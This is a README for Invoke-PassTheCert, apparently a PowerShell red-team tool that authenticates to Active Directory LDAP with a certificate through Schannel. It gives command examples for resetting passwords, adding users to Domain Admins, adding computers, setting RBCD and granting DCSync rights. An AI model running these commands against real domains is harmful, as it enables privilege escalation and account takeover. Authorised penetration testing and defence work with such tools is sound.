Invoke-PassTheCert is a pure PowerShell port of PassTheCert. The purpose of this repository is to expand the landscape of PowerShell tooling available to Penetration testers and red teamers.
The original work by AlmondOffsec can be found here: https://github.com/AlmondOffSec/PassTheCert along with the accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. However, several protocols, including LDAP, support Schannel, thus authentication through TLS.
If the certificate is password protected you will need to provide the -CertificatePassword parameter.
The -Certificate parameter accepts either a path to a PFX file or a Base64 encoded certificate MIINA...
Invoke-PassTheCert -Server "dc01.domain.com" -Certificate "cert.pfx" -WhoamiDisplay the current identity authenticated via the certificate.
Invoke-PassTheCert -Server "dc01.domain.com" -Certificate "cert.pfx" -WhoamiReset a target user's password to a random value.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -ResetPassword "CN=John Doe,CN=Users,DC=domain,DC=com"Adds an SPN (e.g., cifs/fake.domain.com) to a user object.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddSPN "CN=svc_user,CN=Users,DC=domain,DC=com"Removes SPN from target.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveSPN "CN=svc_user,CN=Users,DC=domain,DC=com"Adds a user or computer to a specified group.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddToGroup "CN=John Doe,CN=Users,DC=domain,DC=com" -GroupDN "CN=Domain Admins,CN=Users,DC=domain,DC=com"Removes a user or computer from a group.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveFromGroup "CN=John Doe,CN=Users,DC=domain,DC=com" -GroupDN "CN=Domain Admins,CN=Users,DC=domain,DC=com"Enables or disables a user/computer account.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -ToggleAccountStatus "CN=svc_user,CN=Users,DC=domain,DC=com"Adds a new computer account to the domain. A random password will be generated if -ComputerPassword is omitted.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddComputer "NewPC01" -ComputerPassword "Summer2025!"Removes a computer object from the domain.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveComputer "CN=NewPC01,CN=Computers,DC=domain,DC=com"Grants RBCD rights to a specified user/computer by SID.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddRBCD "CN=TargetPC,CN=Computers,DC=domain,DC=com" -SID "S-1-5-21-..."Removes RBCD rights from a target object.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveRBCD "CN=TargetPC,CN=Computers,DC=domain,DC=com"Grants a user rights to perform DCSync by modifying the domain security descriptor.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -Elevate "CN=svc_user,CN=Users,DC=domain,DC=com"- Support for Start TLS
- Shadow Credential Attacks
- LDAP interactive Shell